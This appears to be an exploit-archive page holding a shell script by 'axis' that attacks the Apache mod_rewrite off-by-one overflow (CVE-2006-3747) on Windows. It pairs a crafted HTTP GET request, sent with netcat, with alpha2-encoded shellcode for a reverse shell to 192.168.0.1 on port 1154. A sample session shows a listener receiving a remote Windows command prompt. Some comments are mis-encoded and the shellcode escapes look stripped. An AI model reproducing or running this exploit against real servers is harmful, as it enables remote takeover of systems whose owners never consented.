[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
# Published : 2007-04-07
# Author : axis
# Previous Title : Kerberos 1.5.1 Kadmind Remote Root Buffer Overflow Vulnerability
# Next Title : FileCOPA FTP Server <= 1.01 (LIST) Remote Buffer Overflow Exploit (2) 


#!/bin/sh
# Exploit for Apache mod_rewrite off-by-one(Win32).
#
# by axis <axis@ph4nt0m>
# http://www.ph4nt0m.org
# 2007-04-06
#
# Tested on Apache 2.0.58 (Win32)
# Windows2003 CN SP1
#
# Vulnerable Apache Versions:
# * 1.3 branch: >1.3.28 and <1.3.37
# * 2.0 branch: >2.0.46 and <2.0.59
# * 2.2 branch: >2.2.0 and <2.2.3
#
#
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
# 
# first POC by jack <jackx40gulcasx2Eorg>
# 2006-08-20
# http://www.milw0rm.com/exploits/2237
#
#
# 
# to successfully exploit the vuln,there are some conditions
# http://www.vuxml.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html
# 
# 
# some compilers added padding to the stack, so they could not be exploited,like gcc under redhat
# 
# for more details about the vuln please see:
# http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded
# 
# 
# no opcodes needed under windows!
# it will directly run our shellcode
# 
# my apache config file
# [httpd.conf]:
# RewriteEngine on
# RewriteRule 1/(.*) $1
# RewriteLog "logs/rewrite.log"
# RewriteLogLevel 3
# 
# 
# Usage:
# [axis@security-lab2 xploits]$ sh mod_rewrite.sh 10.0.76.141
# mod_rewrite apache off-by-one overflow
# 
# [axis@opensystemX axis]$ nc -vv -n -l -p 1154
# listening on [any] 1154 ...
# connect to [x.x.x.111] from (UNKNOWN) [10.0.76.141] 4077
# Microsoft Windows [????¨¤? 5.2.3790]
# (C) ???¡§¡§?¡ì?¡§¡ä¡§?D 1985-2003 Microsoft Corp.
# 
# D:ApacheApache2>exit
# exit
#  sent 5, rcvd 100
# 
# 
# 
# shellcode ¦Ì?badchar¡ê??¨°?a¨¤?¨®?¦Ì?¡ê???¨º¦Ì2?D¨¨¨°a???¡ä?¨¤
# ?¨°?¨²¦Ì?¨¢???badchar¨º? 0x3fo¨ª 0x0b ??????¨º?¨°??¡ã¨¦¨²3¨¦shellcode?¡ã1?D?¡À¡ê¨¢?¦Ì?
# 0x00 0x3a 0x22 0x3b 0x7d 0x7b 0x3c 0x3e 0x5c 0x5d 0x3f 0x0b
#


echo -e "mod_rewrite apache off-by-one overflow"


if [ $# -ne 1 ] ; then
  echo "Usage: $0 webserver"
  exit
fi

host=$1

#use ldap:// to trigger the vuln, "Ph4nt0m" is any arbitrary string
echo -ne "GET /1/ldap://ph4nt0m/`perl -e 'print "Ph4nt0m"x5'`  
# %3f to trigger the vuln
%3fA%3fA%3f    
#string "CCCC.." is any arbitrary string, use %3f to trigger the vuln
#%90 is the machine code we will jmp to(NOP),run shellcode from here
`perl -e 'print "C"x10'`%3fC%3f%90    
# shellcode,reverse shell to 192.168.0.1 ,port 1154  alpha2 encoded
`perl -e 'print "    
xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49
x49x49x49x49x49x49x49x49x49x37x49x49x51x5ax6ax63
x58x30x42x30x50x42x6bx42x41x73x42x32x42x41x41x32
x41x41x30x41x41x58x50x38x42x42x75x69x79x79x6cx51
x7ax6ax4bx50x4dx4dx38x6bx49x79x6fx49x6fx6bx4fx65
x30x4cx4bx72x4cx45x74x51x34x4ex6bx71x55x77x4cx6c
x4bx33x4cx64x45x33x48x64x41x5ax4fx4cx4bx72x6fx36
x78x4cx4bx73x6fx45x70x66x61x4ax4bx53x79x4ex6bx44
x74x4ex6bx73x31x38x6ex55x61x79x50x6cx59x6cx6cx4b
x34x6fx30x74x34x34x47x59x51x5ax6ax76x6dx76x61x6f
x32x5ax4bx79x64x55x6bx33x64x51x34x41x38x30x75x4b
x55x6ex6bx33x6fx44x64x46x61x7ax4bx32x46x6ex6bx34
x4cx42x6bx6ex6bx73x6fx77x6cx54x41x58x6bx43x33x74
x6cx6cx4bx4dx59x50x6cx74x64x75x4cx52x41x6fx33x50
x31x6bx6bx72x44x4cx4bx50x43x66x50x6cx4bx33x70x64
x4cx6cx4bx74x30x65x4cx4ex4dx4ex6bx53x70x47x78x33
x6ex51x78x4cx4ex52x6ex56x6ex58x6cx50x50x59x6fx79
x46x70x66x62x73x75x36x75x38x66x53x64x72x42x48x53
x47x32x53x50x32x71x4fx71x44x49x6fx48x50x52x48x5a
x6bx48x6dx6bx4cx65x6bx70x50x4bx4fx68x56x61x4fx4e
x69x4ax45x30x66x6ex61x78x6dx67x78x73x32x42x75x52
x4ax75x52x6bx4fx7ax70x61x78x6bx69x55x59x6cx35x6e
x4dx51x47x4bx4fx4ex36x70x53x50x53x56x33x76x33x43
x73x32x73x31x53x52x73x6bx4fx4ax70x70x68x6fx30x6d
x78x35x50x46x61x30x66x30x68x76x64x6cx42x33x56x70
x53x4ex69x78x61x4cx55x75x38x4ax4cx58x79x4cx6ax73
x50x53x67x6bx4fx6ax76x73x5ax72x30x73x61x53x65x4b
x4fx6ax70x52x46x31x7ax52x44x73x56x50x68x51x73x50
x6dx32x4ax62x70x51x49x47x59x6ax6cx6cx49x4bx57x42
x4ax73x74x6dx59x6dx32x35x61x6fx30x48x73x4fx5ax6f
x65x4cx49x39x6dx4bx4ex33x72x54x6dx6bx4ex33x72x34
x6cx6cx4dx50x7ax57x48x4ex4bx4cx6bx6cx6bx71x78x32
x52x6bx4ex6cx73x42x36x49x6fx73x45x65x78x6bx4fx6e
x36x71x4bx42x77x43x62x53x61x76x31x70x51x30x6ax35
x51x62x71x76x31x72x75x43x61x4bx4fx6ex30x73x58x4e
x4dx7ax79x37x75x38x4ex31x43x4bx4fx4ax76x30x6ax39
x6fx6bx4fx70x37x6bx4fx6ex30x45x38x39x77x54x39x79
x56x71x69x79x6fx53x45x56x64x69x6fx69x46x6bx4fx62
x57x6bx4cx4bx4fx6ax70x50x68x6ax50x6fx7ax37x74x43
x6fx72x73x4bx4fx6ax76x79x6fx38x50x63
"'`
HTTP/1.0rn
Host: $hostrnrn" | nc -vv $host 80

# www.Syue.com [2007-04-07]